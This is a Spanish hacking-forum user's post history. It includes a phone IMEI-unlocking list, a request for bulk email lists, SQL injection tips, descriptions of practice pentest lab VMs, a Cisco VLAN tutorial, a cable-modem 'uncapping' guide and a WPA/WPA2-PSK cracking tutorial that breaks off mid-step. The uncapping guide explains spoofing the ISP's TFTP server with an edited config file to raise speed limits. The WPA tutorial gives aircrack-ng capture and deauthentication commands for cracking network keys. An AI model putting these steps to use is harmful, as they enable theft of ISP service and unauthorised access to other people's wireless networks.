Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - $ad

Páginas: [1] 2
1
Gracias.
Un saludo.

2
Bugs y Exploits / Re:[Tutorial] Conociendo Metasploit Framework
« en: Mayo 01, 2011, 03:46:23 pm »
u.u men pero eso no es de  By Rcart hay parte que es de shell root es amigo mio de la comunida dragonjar ;)

Sé perfectamente quien es Shell Root y en este manual el trabajo es de Rcart 100% ...sé quien es Rcart y lo que hace Rcart aquí es incluir aportes de Shell Root pero con Link externos en ningún momento introduce material directo. No sé ni porque me molestro en escribir esto xD! Porque este tutorial lo tengo más que repasado....

Saludos.

3
Si alguien conoce o tiene listas de correos electronicos o BD o CD's con BD de correos electrónicos por favor que los pase.

Gracias y saludo.

4
Phreak / Móviles para liberar via IMEI
« en: Abril 03, 2011, 07:36:40 am »
- ALCATEL: Modelos HC-800, HC-1000 y Hx1 (estos ultimos son los antiguos One Touch monobanda, los que están por detras de los modelos db).

- NOKIA: Cualquier nokia puede ser liberado en la actuliadad por imei. Sea el que sea, el más antiguo al más moderno.
NOKIA:1100,1100a,1100b,1101,2300,3100,3100b,3105,3 108,3120,3200,3200b,
3300,3350,3510,3510i,3520,3530,3560,3570,3585,3585 i,3586,3586i,3588,3588i,
3590,3590e,3595,3595e,3610,3650,5100,5100e,6100,61 00e,6108,6200,6200e,
6220,6225,6310,6310i,6310e,6340,6340i,6340e,6360,6 370,6385,6390,6500,
6510,6510e,6560,6585,6590,6590i,6590e,6610,6610e,6 620,6650,6800,6800e,
6810,6820,7200,7210,7210e,7210i,7250,7250i,7250e,7 700,8310,8310i,8310e,
8390,8390e,8510,8510e,8910,8910i,8910e,9210,

640,650,1220,1260,1261,2100,2146,2160,2160i,2170,2 180,2190,
2260,2270,2285,3210,3260,3285,3310,3310e,3315,3320 ,3330,3350,
3360,3361,3365,3390,3390b,3395,3410,3610,3810,5110 ,5110i,5120,5120i,5125
5130,5140,5146,5148,5160,5165,5170,5170i,5180,5185 ,5185i,5190,5210,5510,
6090,6110,6110i,6120,6120i,6130,6138,6150,6150e,61 60,6160i,6161,6162,
6170,6185,6188,6190,6210,6210e,6250,6290,7110,7160 ,7190,72xx,73xx,8210,
8250,8260,8265,8265i,8270,8280,8290,8810,8850,8855 ,8860,8890,9000,9000i,
9110,9110i,9210,9210e,9210e,9290,nk402,nk503,nk702 ,ringo
Nokia 1100, , 1110, 1260, 1600, 2100, 2160, 2170, 2180, 2190, 2220, 2260, 2270, 2280, 2300, 2600, 2650, 3100, 3120, 3200, 3210, 3220, 3230, 3285, 3300, 3310, 3315, 3320, 3330, 3350, 3360, 3390, 3395, 3410, 3510, 3520, 3530, 3560, 3570, 3590, 3600, 3610, 3620, 3650, 3660, 3810, 5100, 5110, 5120, 5125, 5130, 5140, 5146, 5160, 5190, 5210, 5510, 6020, 6030, 6090, 6100, 6101, 6102, 6108, 6110, 6111, 6120, 6130, 6138, 6150, 6160, 6161, 6162, 6170, 6185, 6190, 6200, 6210, 6220, 6225, 6230, 6250, 6260, 6310, 6340,6360, 6370, 6500, 6510, 6560, 6590, 6600, 6610, 6620, 6650, 6660, 6670, 6800, 6810, 6820, 7110, 7160, 7190, 7200, 7210,7210, 7210i, 7250, 7250, 7250i, 7260, 7270, 7280, 7600, 7610, 7650, 7700, 7710, 8210, 8250, 8260, 8265, 8270, 8280, 8290, 8310, 8390, 8510, 8800, 8810, 8850, 8855, 8860, 8890, 8910, 9000, 9110, 9210, 9290, N-gage and N-gage QD.

Excepto Nokia 2310,2610,5200, 6125, 6131, 6151, 6234, 6280, 6630, 6650,6680, 7370, 7380, E50, E60,E61, N70, N71,N72,N73,N75,N80, N90, N91,N92,N93,N95 que no pueden ser liberados por imei GRATIS en la actualidad

- LG: Modelos 1200, 1300, 510, 520, 510W, 7010, 7020, B1200, B1300, G510, M1200, M1300, W3000, C1200, G3000, G5200 y W5200.

- NEC: Modelos C313, C316, E606, E613, E616, E808.

- SAMSUNG: Modelos A300, A400, A800, E500, E700, E715, M100, P400, S100, S105, S300, S307, S500, SGH-600, SGH-2100, V200, X100, X600.

- SIEMENS: Modelos 8008, CL50, CL55, ST55.

- SONY: Modelos CMD-C1, CMD-CD5 (no confundir con Sony Ericsson)

- PANASONIC: Modelos G50, GD50, G51, GD55.

5
Bugs y Exploits / Re:Inyeccion Sql desde 0 by el Gran Gauson
« en: Mayo 19, 2010, 01:29:34 pm »
Citar
Hola disculpa mi ignorancia pero creo q varios tenemos la duda de q significa "Id=-1 " en algunos casos no acepta los caracteres de /**/ ni -- para indicar q luego de éstos solo hay comentarios y donde podemos sacar palabras en hexadecimal para usarlas en la inyeccion?
gracias

Lee esto.

PD:

Debes sacar las tablas, la "palabra" que se pasa a ASCII (En algunos casos) es el nombre de la tabla "objetivo", para obtener de esta el numero de columnas, y posteriormente imprimir los datos.

7
Bugs y Exploits / Re:[Seguridad Informatica] Sec-Track
« en: Mayo 17, 2010, 12:27:39 pm »
PwnOS


Escenario: Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas.
Dicho servidor se encuentra en una de sus redes xxx.xxx.xxx.xxx.

El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.

Categoría: Fundamentación, Test de Penetración, Explotación de vulnerabilidades.
Nivel de Dificultad: Medio / Alto
Formato: Imágen VMWare
Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Informacion Confidencial.
Herramientas/Recursos: OSSTMM
Configuracion: El router/tarjeta de red virtual/fisica debe tener DHCP activo.
Descargar (Imágen VMWare): http://www.adrive.com/public/0da911443f10d5bdcc9d35644f9c2b935df9d2e8823b02597661731be1622991.html
MD5:

Fuente: http://www.sec-track.com/pwnos

8
Bugs y Exploits / Re:[Seguridad Informatica] Sec-Track
« en: Mayo 17, 2010, 12:27:21 pm »
De-ICE PenTest LiveCDs (Nivel III)


Escenario: Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir.

La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y están inseguros de las capacidades del anterior (o actual) personal.

Categoría: Fundamentación, Test de Penetración
Nivel de Dificultad: Bajo/Medio
Formato: .ISO / Imágen VMWare
Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.
Herramientas/Recursos: OSSTMM
Configuracion: El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.2.2 y la máscara de subred 255.255.255.0

Descargar (ISO): http://www.adrive.com/public/86f947403b763617c459acec9ac3666d192d38107cb2a441099a552c138613c1.html
MD5:

Fuente: http://www.sec-track.com/de-ice-pentest-livecds-nivel-iii

9
Bugs y Exploits / Re:[Seguridad Informatica] Sec-Track
« en: Mayo 17, 2010, 12:27:02 pm »
De-ICE PenTest LiveCDs (Nivel II)


Escenario: Una pequeña empresa te contrata para que realices un Test de Penetración avanzado. El administrador de sistemas de dicha empresa dice haber reconfigurado el sistema para hacerlo muy seguro. Espera que usted intente por todos los medios posibles de vulnerar el sistema, pues está seguro de que es invulnerable. Este sistema es un servidor FTP utilizado para crear y restaurar copias de seguridad de los diferentes sistemas. Dice además que no hay información sensible y que dicho sistemas alguna vez fue utlizado por un cliente para transferencias de información, pero que esta ha sido eliminada.

Categoría: Fundamentación, Test de Penetración
Nivel de Dificultad: Bajo / Medio
Formato: .ISO / Imágen VMWare
Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.
Herramientas/Recursos: OSSTMM

Configuracion: Este entorno esta configurado para que de manera automática obtenga la dirección IP  192.168.1.110. El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.1.2 y la mascara de subred 255.255.255.0

Descargar (ISO): http://www.adrive.com/public/d5d214a87a287e301147c8f6ec5a5b183ac034de47c8f96c3c6fad2db2b2dbcb.html
MD5:

Fuente: http://www.sec-track.com/de-ice-pentest-livecds-nivel-ii

10
Bugs y Exploits / Re:[Seguridad Informatica] Sec-Track
« en: Mayo 17, 2010, 12:26:42 pm »
De-ICE PenTest LiveCDs (Nivel I)

Escenario: Un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus).

Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.

Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.


Categoría: Fundamentación, Test de Penetración
Nivel de Dificultad: Bajo
Formato: .ISO / Imágen VMWare
Objetivos/Técnicas: Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.
Herramientas/Recursos: OSSTMM / Nmap / Xhydra / Netcat / Medusa / NetDiscover / Nessus
Configuracion: Este entorno esta configurado para que de manera automática obtenga la dirección IP  192.168.1.100. El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.1.2 y la máscara de subred 255.255.255.0

Descargar (ISO): http://www.adrive.com/public/d5dc5d5dd7eec2d5ee6051d3d5ab235f5c8273357169e8dd6b01069fc5e4c51f.html
MD5: a3341316ca9860b3a0acb06bdc58bbc1

Fuente: http://www.sec-track.com/de-ice-pentest-livecds-nivel-i

11
Bugs y Exploits / [Seguridad Informatica] Sec-Track
« en: Mayo 17, 2010, 12:26:21 pm »


Sec-Track es un proyecto colaborativo que ofrece un repositorio de recursos relacionados con la implementación y desarrollo de laboratorios de entrenamiento e investigación sobre Seguridad Informatica. Estos recursos son distribuidos por medio de entornos virtualizados que asemejan entornos reales, dichos entornos pueden ser implementados en diferentes ambientes de capacitación e investigación.

Sec-Track ofrece también un amplio repertorio de instrucciones para la implementación de entornos de virtualización, con la finalidad de que cada interesado en implementar uno de los laboratorios y/o entornos disponibles pueda hacerlo simplemente siguiendo dichas instrucciones.

Sec-Track pone a disposición la documentación base para el desarrollo de entornos virtualizados por parte de los usuarios inscritos. Estos serán publicados en Sec-Track y cualquier persona, organización o entidad podrá descargarlos y tratar de cumplir con los objetivos propuestos por sus desarrolladores.

Otro de los objetivos de Sec-Track es ofrecer un espacio colaborativo en el cual, las diferentes comunidades y usuarios puedan publicar sus propios entornos de entrenamiento, retos y pruebas en cualquiera de las diferentes temáticas, con la finalidad de que las demás comunidades puedan descargarlos e implementarlos para buscar una solución al mismo, pero aun más importante generar la respectiva documentación de dicho proceso.


¿Cuáles son las temáticas que abarca Sec-Track?
Sec-Track tratará de cubrir cada una de las temáticas relacionadas con la seguridad informática. Por ahora ofrecemos los siguientes campos de acción:

    * Test de Penetración
    * Análisis de Malware
    * Criptografía
    * Aseguramiento (Hardening)
    * Ingeniería Inversa
    * Informática Forense
    * Gobierno IT


¿Cómo funciona Sec-Track?
Sec-Track es un proyecto colaborativo. Por lo tanto espera ser autosostenible a nivel de contenido y publicaciones.

Esto quiere decir que se publicarán una serie de entornos, retos, pruebas, wargames, etc. y estos deben ser solucionados por sus propios usuarios (comunidades, grupos de estudio e investigación, empresas, listas de seguridad, etc.)

La finalidad es que alguno de estos grupos publique la respectiva documentación (papers, video tutoriales, audios) de como realizó dicho proceso.

Si uno de estos grupos tiene una nueva propuesta basada en los entornos publicados o sobre nuevos entornos (aseguramiento, análisis forense, aumento de complejidad de las técnicas utilizadas) puede utilizar el formulario de contacto y enviar estas ideas para que sean implemetadas en Sec-Track.

Fuente: http://www.sec-track.com/

12
Bugs y Exploits / Re:Defacing de la manera correcta desde 0
« en: Mayo 10, 2010, 11:43:13 am »
Gran aporte m3n XD. "leido" XD.

Un Salu2!

13
Redes y antenas / [Tutorial] Redes [VLAN] {Que son y como crearlas}
« en: Mayo 08, 2010, 11:59:29 am »
VLan´s para newbies por Han

Bueno cuando estaba comenzando en esto de las redes este fue uno de los temas que mas me sorprendio ( obvio estaba comenzando )

 Vlan significa: Virtual Lan , en otras palabras podemos configurar varias Lan (virtuales) en una sola "Lan" (fisica) ... una imagen es mejor que 1000 palabras.

tenemos esta topologia de red fisicamente (imagen 1) :

1 SW Cisco ( Imagen 2 )( Main SW - puede ser cualquier otra marca, lo que importa es que sea administrable)
8 Equipos que pertenecen cada uno a un departamento (Ingenieria , logistica, administrativo)
todos los vamos a conectar al mismo SW (Imagen 2)

Imagen 1

Imagen 2



ahora comenzamos a conectar y configurar las IP de cada equipo ( Imagen 3 y 4)


Imagen 3


Imagen 4


Listo tenemos la infraestructura Fisica de la imagen 5
Imagen 5

Diagrama 1

Departamento Ingenieria
 Desarrollador ----------- 10.0.0.1
 Ing Storate -------------- 10.0.0.2
 Aux Ingenieria ---------- 10.0.0.3

Departamento Logistica
 Logistica 1 ---------------10.0.0.4
 Logistica 2 --------------- 10.0.0.5

Departamento Administravito
 Admisnitrativo 1 ----------- 10.0.0.6
 Admisnitrativo 2 ----------- 10.0.0.7
 Admisnitrativo 3 ----------- 10.0.0.8



pero lo que vamos a lograr tener con la configuracion que vamos a hacer es algo como esto ( imagen 6)

Imagen 6

Osea estamos emulando 3 Lan ( Virtuales) con 1 solo SW fisico ... como se logra esto ?? modificando las propiedades del SW.

Para esto nos conectamos al SW por un cable de consola ( que en simulador es IOS Command) y entramos al SW.

este simulador es tan preciso que cuando ingresamos a el SW nos muetra lo que en realidad nos mostraria nuestro pc al acceder al SW que seria esto :

Código: [Seleccionar]
C2950 Boot Loader (C2950-HBOOT-M) Version 12.1(11r)EA1, RELEASE SOFTWARE (fc1)
Compiled Mon 22-Jul-02 18:57 by miwang
Cisco WS-C2950-24 (RC32300) processor (revision C0) with 21039K bytes of memory.
2950-24 starting...
Base ethernet MAC Address: 00D0.584E.B340
Xmodem file system is available.
Initializing Flash...
flashfs[0]: 1 files, 0 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 64016384
flashfs[0]: Bytes used: 3058048
flashfs[0]: Bytes available: 60958336
flashfs[0]: flashfs fsck took 1 seconds.
...done Initializing Flash.

Boot Sector Filesystem (bs:) installed, fsid: 3
Parameter Block Filesystem (pb:) installed, fsid: 4


Loading "flash:/c2950-i6q4l2-mz.121-22.EA4.bin"...
########################################################################## [OK]
              Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

           cisco Systems, Inc.
           170 West Tasman Drive
           San Jose, California 95134-1706



Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 18-May-05 22:31 by jharirba

Cisco WS-C2950-24 (RC32300) processor (revision C0) with 21039K bytes of memory.
Processor board ID FHK0610Z0WC
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)

63488K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address: 00D0.584E.B340
Motherboard assembly number: 73-5781-09
Power supply part number: 34-0965-01
Motherboard serial number: FOC061004SZ
Power supply serial number: DAB0609127D
Model revision number: C0
Motherboard revision number: A0
Model number: WS-C2950-24
System serial number: FHK0610Z0WC

Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 18-May-05 22:31 by jharirba

Press RETURN to get started!


%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/2, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/3, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/3, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/4, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/4, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/5, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/5, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/6, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/6, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/7, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/7, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/8, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/8, changed state to up

Listo ahora le decimos a el SW que queremos entrar en el modo "habilitado" que seria enable en ingles, para esto le damos el siguiente comando

Código: [Seleccionar]
Switch>enable
y con esto entrara al modo "habilitado" , ahora vamos a ver que Vlan tiene el SW por defecto, para esto damos el comando :

Código: [Seleccionar]
Switch#show vlan
y con esto nos mostrata la imagen 7

PD1: notese que cuando se cambia de un prom a otro cambia de caracter, al principio estaba " Switch>" y ahora esta "Switch#"

Imagen 7

la imagen 7 nos dice algo muy importante y es que por defecto el SW ya utiliza el concepto de vlan, notemos que todas las interfaces estan en la vlan1 osea que todos los puertos fisicos del SW corresponden a sola 1 LAN virtual, es esta la razon por la cual los equipos por defecto pueden comunicarse entre si, sin necesidad de hacer ninguna configuracion sobre el SW

PD2: El SW tiene 24 puertos fisicos , donde la interface FastEthernet 0/1 del que nos hablaran mas adelante corresponde al puerto 1 fisico del SW, osea el hueco numero 1 donde podemos poner un cable de red (mirar imagen 2)

Listo sabiendo esto ahora, vamos a proceder a crear mas Vlan ( las 3 vlan que queremos ), para esto en el mismo modo en que estamos ingresamos el comando

Código: [Seleccionar]
vlan database
con este comando ingresaremos a la base de datos de las vlans para poder crear y modificarlas, para crear una nueva vlan damos el comando

Código: [Seleccionar]
vlan 2 name Ingenieria
donde 2 es el numero consecutivo de la vlan que queremos crear, como la vlan 1 ya existe ( por defecto) usamos la 2 y donde ingenieria coresponde a un nombre descriptivo para la vlan

nos quedara algo asi (imagen 8)

Imagen 8

con esto ya hemos creado las 2 Lan virtuales que queremos para segmentar la red fisica que tenemos (usaremos la vlan2 para ingenieria, la vlan3 para logistica y la vlan1 por defecto para administrativo).

con esto solo le hemos dicho al SW que tenemos 3 Lan virtuales, pero ahora como le decimos que el equipo 1 corresponde a la vlan 2, pues sencillo, ingresamos a un modo ahora llamado "configuracion de terminal" y le diremos a cada interface del SW a que vlan corresponde (recuerda que la interface corresponde a el puerto fisico del SW (imagen 2))

para ingresar al modo configuracion de terminal tecleamos

Código: [Seleccionar]
configure terminal
y el prom quedara asi

Código: [Seleccionar]
Switch(config)#
ahora desde este modo ingresaremos a la interface Fast Ethernet 0/1 ( corresponde a el puerto fisico 1 del SW donde esta conectado el equipo 1 del departamento de ingenieria) y le diremos que ese puerto pertenece a la vlan 2

comandos

Código: [Seleccionar]
Switch(config)#interface fastEthernet 0/1
el prom quedara asi

Código: [Seleccionar]
Switch(config-if)#
y luego le diremos que el puerto es de modo aceso

Código: [Seleccionar]
Switch(config-if)#switchport mode access
y por ultimo le diremos que pertenece a la vlan2

Código: [Seleccionar]
Switch(config-if)#switchport access vlan 2
y asi susecivamente para todas las interfaces ( mirar imagen 9)

Imagen 9

listo ya tenemos nuestras vlans creadas y los puertos asignados, miremos como lo muestra de nuevo el SW.

vamos a el modo enable de nuevo (desde el modo configuracion de terminal no se puede mirar esto)

y damos el comando

Código: [Seleccionar]
show vlan
y nos mostrata las vlan y los puertos asignados (comparar imagen 10 con imagen 7)

imagen 10


y ahora probaremos la configuracion hacindo ping entre los equipos, y esto es lo que deberia de pasar

departamento de ingenieria debe tener conectividad entre si, pero no puede tener con logistica ni con administrativo

osea las IP de Ingenieria deberia tener respuesta ( ping) entre ellos pero no con ninguna IP de otro departamento ( Mirar diagrama 1 ... arriba )


Imagen 11

notemos que estoy haciendo la prueba sobre el equipo desarrollador (perteneciente a el departamento ingenieria y que tiene IP 10.0.0.1) y este equipo puede ver a sus compañeros 10.0.0.2 y 10.0.0.3, pero no puede ver a el equipo 10.0.0.4 ni al 10.0.0.5 (logistica ... request time out) ni tampoco puede ver a los de la vlan1 (administrativo)


CONCLUCION: tenemos 3 redes virtualmente separada en 1 solo SW fisico.


Autor: Han
Fuente: CPH

14
Redes y antenas / Manual Uncapping
« en: Mayo 08, 2010, 11:52:38 am »
Este texto no fue invencion mia, mas bien fue una traduccion de varios textos encontrados en la web de  www.cablemodemhack.net yo los traduje y lo recopile en este pequeño texto :-)

Antes que otra cosa se estaran preguntando ¿que demonios es el uncapping?, bueno en la traduccion al español seria algo asi como "destapar", nuestro modem nada mas y nada menos!! si alguna vez has soñado con acelerar tu conexion por cable a velocidades como 2mbps con este texo es posible!.

Advierto que la tecnica que describo a continuacion es con fines educativos ;-) y el que escribe esto no se hace resonsable de los usos no apropiados que se le pueda dar a esta informacion...

IntrducCion! Cada vez que encedemos nuestro modem este se conecta de forma automatica al TFTP(Trivial Transfer Protocol)de nuestro ISP y pide nuestro archivo de configuracion por lo general llamado "384kbps.cm" en mi caso asi se llama ya q mi conexion es a esa velocidad, este mismo archivo controla la velocidad de nuestra conexion, y nuestro objetivo es pillarlo, modificar sus valores y subirlo de nuevo al TFTP asi podremos cambiar nuestra velocidad sencillo no! ;-)

¿Como hacerlo? Dirigete a http://www.tcniso.net/Nav/Software/
Y descargate los TCniSo steps 1,2,3,5 Ahora lo que tienes que hacer es seguir los siguientes pasos:


1) Abre el programa TCNiso step 1 y picale en donde dice "Star Query", esto generara un archivo donde se guardaran los datos necesarios para llevar a cabo el siguiente paso.

2)Bajate el archivo de configuracion de tu ISP con el TCNiso step 2, no olvides poner este programa en la misma carpeta que el anterior, ejecutalo y descargaras el archivo de configuracion que puede llamarse 64kbps_pc01.bin o 384kbps.cm (en mi caso asi se llama).

3)Abre el archivo que bajaste con el programa DocSiS32 Pro o con el ConfigEdit, igual los bajas de la web q te di antes. Un archivo de configuracion se ve mas o menos asi...(recuerda que depende mucho de tu ISP la estructura pero imagino que no cambia mucho)

Main {
DownstreamFrequency 435000000;
UpstreamChannelId 0;
NetworkAccess 1;
ClassOfService {
ClassID 1;
MaxRateDown 384000;
MaxRateUp 64000;
}
MaxCPE 1;
/* EndOfDataMarker */
/* Pad */


Aqui lo unico que modificaremos es el MaxRateDown (que es la velocidad de download)por la velocidad que nosotros queramos por ejemplo si quisieramos acelerarla a 512kbps seria MaxeRateDown 512000 y la de MaxRateUp que es la velocidad de upload. Trata de no poner numero enormes porq tu ISP podria darse cuenta y te meterias en un buen lio... :-(

Guarda este archivo en otra carpeta pero con el mismo nombre y extension, que el archivo original.

4)Bueno ahora es tiempo de configurar tu PC:

*Si eres usuario de Win98 o WinMe deberas deshabilitar tu tarjeta de red para hacer este paso, esto es para evitarse estar reiniciando la PC q hueva :[email protected]!, para deshabilitar tu tarjeta de red: da click derecho en Mi Pc-->Administrador de Dispositivos-->Buscas tu modem-->Propiedades-->Deshabilitar este perfil de Hardware, ahora ya deshabilitada te vas a las propiedades de la Red en el Panel de Control (no me pregunten como hacerlo eso es basico!)y modificamos los siguientes valores:

+Nuestra direccion IP la cambiamos por la direccion del DHCP server esta la podemos averiguar AQUI

+Mascara de Subred: 255.255.255.0

+Puerta de enlace: 192.168.100.1 que es la ip de nuestro ETHERNET.

Terminando esto le dan aceptar, y si les pide reiniciar lo ponen que no, en vez de esto vuelven a habilitar la tarjeta de red con los mismo pasos q describi antes solo a ahora la habilitan sencillo! bien pasemos al paso 5

5)Bueno ahora ejecutaremos el TFTP Server tambien lo descargas de la pagina q te di, aqui solo le das la ruta de donde guardaste el archivo modificado (el 384kbps.cm o como se llame), despues de esto le quitas la corriente al modem o lo desconectas es lo mismo y activas el TFTP Server, te esperas unos 15 seg y vuelves a conectar el modem, veras q despues q se ponga online el modem habras enviado el nuevo archivo de configuracion, en pocas palabras lo que hicimos fue hacerle creer al modem que el servidor era nuestra maquina jeje ;-) NOTA: Aveces en el programa veras todo negro debido a q el fondo y las letras son del mismo color asi q seleccionandolas con el mouse resolveras este problema...Cuando hayas visto q se mando el archivo cierras el TFTP server y vamos al sexto y ultimo paso!!

6)Ahora solo debemos regresar los valores del IP y todo eso a como estaban, (ANTES DESACTIVA TU TARJETA DE RED) Direccion IP "Obtener una direccion IP automaticamente", elimina la puerta de enlace , la mascara de Subred a como estaba :-p ...Ahora activa tu Tarjeta de Nuevo y listo acabas de hacer el unNcaPpinG! creo que notaras el cambio de velocidad...

Bueno es todo por ahora espero que este pequeño texto les haya servido, una vez mas aclaro esta fue una traduccion y recopilacion de textos encontrados en la web...

_________________________________________

Antes de cloncluir este manual, quería comentaros mi problemilla, pues que me bloqueo en el paso 2, cuando abro el TCNiSOStep2.exe, le doy al enlace de "GET FILE", me da error, y no me crea el archivo de configuración, y sin el archivo de configuración no se puede hacer el Uncapping, jeje, me podrían echar un cable (nunca mejor dicho xD).

Autor: hello
Fuente

15
Seguridad Wireless / Cracking WPA/WPA2-PSK
« en: Mayo 07, 2010, 05:04:55 pm »

-[ INFORMACIÓN ]---------------------------------------------------------------------

   Titulo: Cracking WPA/WPA2-PSK with wordlist
   Autor: ka0x
   Contacto: ka0x01[alt+64]gmail.com
   Fecha: 08/03/2009

---------------------------------------------------------------------------------


-[ ÍNDICE ]---------------------------------------------------------------------

   0x01: Introducción
   0x02: ¿Qué es el handshake?
   0x03: Capturando handshake
   0x04: Conseguir clave con diccionario
   0x05: airoWPA-PSK.sh
   0x06: Fin


---------------------------------------------------------------------------------


---[ 0x01: Introducción ]

En este pequeño texto se explicará como obtener la clave de una red inalámbrica con cifrado WPA/WP2
en la que se esté usando un sistema de clave compartida (pre-shared keys - PSK).
Para todo esto necesitaremos capturar un handshake y después con un diccionario atacar al handshake
para obtener la clave.

Imaginemos que en este caso tenemos la siguiente red inalambrica:

- ESSID: ap_labs
- BSSID: 00:1B:02:93:AF:9C
- CANAL: 1
- CLIENTE: 01:C2:B3:04:02:05


---[ 0x02: ¿Qué es el handshake? ]

Pues el handshake se genera cuando un cliente se asocia a la red inalámbrica,
es como un saludo (apretón de manos) entre el punto de acceso y el cliente.
Son los paquetes que se envían entre el AP y el cliente en el momento de la asociación.
para que podamos empezar el ataque con diccionario en una red con cifrado WPA-PSK, necesitaremos haber
capturado estos paquetes.

---------------------------------------------------------------------------------



---[ 0x03: Capturando handshake ]

Bueno empecemos...
Utilizamores la suite de aircrack-ng,  si queremos los sources y demás
podemos entrar a su web: http://www.aircrack-ng.org/doku.php#download

Si utilizamos debian, encontraremos el paquete en los repositorios, instalar:
Código: [Seleccionar]
# apt-get install aircrack-ng
Para poder capturar paquetes, tendremos que poner nuestro adaptador wireles en modo monitor:

Código: [Seleccionar]
# airmon-ng start <iface>
p.e: # airmon-ng start wlan0


Siempre se necesitará tener un cliente 'real' asociado en el AP.
Entonces una vez para empezar a capturar paquetes, utilizaremos airodump-ng:

Código: [Seleccionar]
# airodump-ng --bssid 00:1B:02:93:AF:9C -c 1 -w redWPA wlan0
--bssid -> MAC del punto de acceso.
-w redWPA -> guardará los datos obtenidos en el archivo "redWPA".
-c -> Canal del punto de acesso
wlan0 -> interfaz adaptador inalambrico.

Así capturaremos todo lo que pase por el punto de acceso con MAC: 00:1B:02:93:AF:9C
Entonces vayamos a capturar el handshake...


Como habíamos dicho antes el handshake se genera en el momento que un cliente se asocia al AP.
Entonces, cómo hacemos que se vuelva asociar el cliente al AP?

Facil, desautenticaremos al cliente del AP y esperamos a que se vuelva asociar,
para este proceso usaremos el ataque 0 de aireplay-ng. Este ataque enviará al cliente paquetes de
desautenticacion

Uso:
Código: [Seleccionar]
# aireplay-ng -0 5 -a <MAC_AP> -c <MAC_CLIENTE> <interfaz>
|-> Numero de desautenticaciones que se enviarán.
     Si ponemos un 0, enviará desautenticaciones hasta que lo paremos.

En este caso:
Código: [Seleccionar]
# aireplay-ng -0 15 -a 00:1B:02:93:AF:9C -c 01:C2:B3:04:02:05 wlan0
Cuando ejecutemos esto segun el numero de desautenticaciones nos aparecerá algo así:
Sending DeAuth to station   -- STMAC: [01:C2:B3:04:02:05]

En el momento que el cliente se desasocie y se vuelva a asociar al AP, nosotros con el airodump-ng
